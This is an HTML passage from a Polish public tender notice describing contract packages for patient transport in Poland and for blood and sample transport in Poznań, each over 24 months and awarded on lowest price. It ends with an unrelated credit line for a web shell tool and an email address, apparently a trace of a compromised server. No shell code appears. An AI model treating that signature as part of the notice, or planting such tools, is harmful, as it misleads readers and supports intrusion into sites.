<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - transport pacjentów na terytorium Polski (zespół transportowy, zespół ratowniczy lub zespół specjalistyczny lekarski).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Transport pacjentów na terytorium Polski (zespół transportowy, zespół ratowniczy lub zespół specjalistyczny lekarski).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - transport krwi i próbek oraz odbiór wyników badań na terenie miasta Poznania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Transport krwi i próbek oraz odbiór wyników badań na terenie miasta Poznania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com